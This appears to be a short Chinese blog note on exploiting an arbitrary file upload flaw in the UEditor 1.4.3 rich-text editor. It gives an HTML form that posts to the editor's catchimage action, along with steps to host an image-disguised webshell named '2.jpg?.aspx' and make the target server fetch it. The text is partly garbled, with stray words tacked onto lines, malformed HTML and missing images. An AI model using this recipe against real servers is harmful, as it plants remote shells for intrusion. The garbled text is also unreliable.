UEditor 1.4.3 任意文件上传漏洞

今天测试一个项目,进到后台以后发现使用富文本web编辑器html

image


构造一个恶意的html文件,方便咱们传输数据过去: xxxx为攻击地址web

<form action="http://xxxxxxxxx/controller.ashx?action=catchimage"enctype="application/x-www-form-urlencoded"  method="POST">   <p>shell addr:<input type="text" name="source[]" /></p >   <inputtype="submit" value="Submit" />

</form>

而后制做一个图片马,文件名改成2.jpg?.aspx上传至本身的服务器,经过构造的恶意html进行上传shell

image

个人被安全设备拦截了安全

image


看看别人成功的案例服务器

image

相关文章
相关标签/搜索